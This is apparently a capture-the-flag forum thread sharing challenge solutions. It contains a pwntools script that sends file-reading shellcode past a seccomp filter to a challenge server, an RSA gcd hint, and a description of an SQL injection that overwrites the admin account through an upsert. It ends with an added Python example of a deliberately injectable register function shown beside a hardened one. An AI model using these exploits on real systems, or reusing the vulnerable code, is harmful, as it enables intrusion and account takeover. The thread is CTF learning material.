October 25, 2022 at 2:15 AM
thanks!

October 25, 2022 at 2:34 AM
Thanks

October 25, 2022 at 2:34 AM
Still working on PWN. What I have so far:

Output from seccomp-tools dump ./pumpking

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
 0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
 0009: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL
I wrote this using pwntools, but it's not working:

from pwn import *

context.clear(arch="amd64")

shellcode = shellcraft.linux.openat(-1, "flag.txt")
shellcode1 = shellcraft.linux.read(3, 'rsp', 80)
shellcode2 = shellcraft.linux.write(1, 'rsp', 80)

def main():
    #print(asm(shellcode))
    io = remote("142.93.35.129", 30658)
    io.recvuntil(b"kids: ", timeout=1)
    print(io.recv())
    io.sendline(b"pumpk1ngRulez")
    io.recvuntil(b">> ", timeout=1)
    print(io.recv())
    io.send(asm(shellcode + shellcode1 + shellcode2))
    io.interactive()

if __name__ == "__main__":
    main()
If anyone has any hints, I'd really appreciate it.

October 25, 2022 at 2:42 AM
It's working

October 25, 2022 at 2:59 AM
(October 24, 2022, 02:32 PM)killerbee Wrote: for crypto compute the gcd of c1 - c2 and N is p then compute c1 - p^e1 mod N

it is indeed the flag, bravo dear chap

October 25, 2022 at 3:23 AM
(October 24, 2022, 09:46 PM)lnf02 Wrote: Hey guys @Hacker2222, I found the solution for this Web challenge, doesn't seem to be like an "easy" challenge, more like a medium challenge...
basically you need to work with nested queries, the register API is vulnerable, due to the fact that it is using "insert" without any sanitization on the user's input, so... you need to bypass the "user already exists" check, and after that nest your real query. The thing is, you should be able to manipulate almost perfectly the password column but it is useless... BUT SQL has a built-in function to UPDATE the field where there's a "duplicated" field... Maybe you are understanding what I'm talking about, maybe you are just looking for the god damn flag (script kiddie xD)
In other words:
You need to create a query that is able to bypass the "username already exists" check and after that, check for a duplicated value with the username=admin
If you really want to understand all the logic behind this SQLi, I recommend you read these:
https://www.w3schools.com/sql/sql_union.asp
https://stackoverflow.com/questions/8043908/how-do-i-force-an-insert-into-a-table-with-a-unique-key-if-its-already-in-the-t
Here's the high level SQLi

You are insane ❤️

October 25, 2022 at 3:27 AM
(October 24, 2022, 09:46 PM)lnf02 Wrote: [...]
Great stuff. Thanks for the lesson and resources!

October 25, 2022 at 3:29 AM
(October 24, 2022, 09:46 PM)lnf02 Wrote: [...]
thnx

October 25, 2022 at 3:44 AM
(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here
reversing challenge: thanks @HTBContestant

thanks

October 25, 2022 at 3:55 AM
(October 24, 2022, 09:46 PM)lnf02 Wrote: [...]
Nice Catch Buddy 😁 😉
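Taking lnf02's description of the register API (an INSERT built from user input, with a separate "user already exists" check) as the starting point, this added example, which is not code from any post or from the challenge itself, shows that pattern beside a hardened version. It assumes an in-memory sqlite3 table in place of the challenge's database and an allowlist on usernames.

```python
# Added example, not from any post: the register-API pattern lnf02 describes,
# as a string-built INSERT beside a parameterized one, on an in-memory sqlite3
# table that stands in for the challenge's database.
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")  # assumed allowlist for usernames

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-admin-secret')")  # seed row
    db.commit()
    return db

def register_vulnerable(db, username, password):
    # The user-controlled strings become part of the SQL text, and the
    # existence check and the INSERT are two separate statements.
    exists = db.execute(f"SELECT 1 FROM users WHERE username = '{username}'").fetchone()
    if exists:
        return "user already exists"
    db.execute(f"INSERT INTO users (username, password) VALUES ('{username}', '{password}')")
    db.commit()
    return "registered"

def register_hardened(db, username, password):
    # Reject anything outside the allowlist before touching the database.
    if not USERNAME_RE.match(username):
        return "invalid username"
    try:
        # Placeholders keep the input as data, and the PRIMARY KEY makes the
        # duplicate check part of the INSERT itself: no check-then-insert
        # window and no query text for an upsert clause to be nested into.
        db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    except sqlite3.IntegrityError:
        return "user already exists"
    db.commit()
    return "registered"

def stored_password(db, username):
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None
```

With the string-built version a username containing a single quote already breaks the statement, which is the symptom to look for in error logs; the hardened version stores it as data or rejects it outright.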